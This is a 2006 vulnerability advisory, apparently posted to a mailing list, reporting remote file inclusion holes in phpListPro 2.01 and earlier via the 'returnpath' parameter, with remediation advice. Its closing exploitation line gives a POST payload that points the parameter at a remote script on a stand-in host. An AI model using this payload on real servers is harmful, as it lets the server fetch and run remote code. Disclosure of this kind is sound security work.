|
[MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include Vulnerability =0D
--------------------------------------------------------=0D
Software: phpListPro =0D
Version: <=2.01=0D
Type: Multiple Remote File Include Vulnerability=0D
Date: May, 8th 2006=0D
Vendor: SmartISoft=0D
Page: http://smartisoft.com=0D
Risc: High=0D
=0D
=0D
Credits:=0D
----------------------------=0D
'Aesthetico'=0D
http://www.majorsecurity.de=0D
=0D
=0D
Affected Products:=0D
----------------------------=0D
phpListPro 2.01 and prior=0D
=0D
=0D
Description:=0D
----------------------------=0D
PHP/mySQL rating TopList professional.=0D
=0D
=0D
Requirements:=0D
----------------------------=0D
register_globals = On=0D
=0D
=0D
Vulnerability:=0D
----------------------------=0D
Input passed to the "returnpath" parameter in "editsite.php", "addsite.php", "in.php" is not=0D
properly verified, before it is used to include files. =0D
This can be exploited to execute arbitrary code by including files from external resources.=0D
=0D
=0D
Solution:=0D
----------------------------=0D
Edit the source code to ensure that input is properly sanitised.=0D
=0D
Set "register_globals" to "Off".=0D
=0D
=0D
Exploitation:=0D
----------------------------=0D
Post data:=0D
returnpath=http://www.yourspace.com/yourscript.php?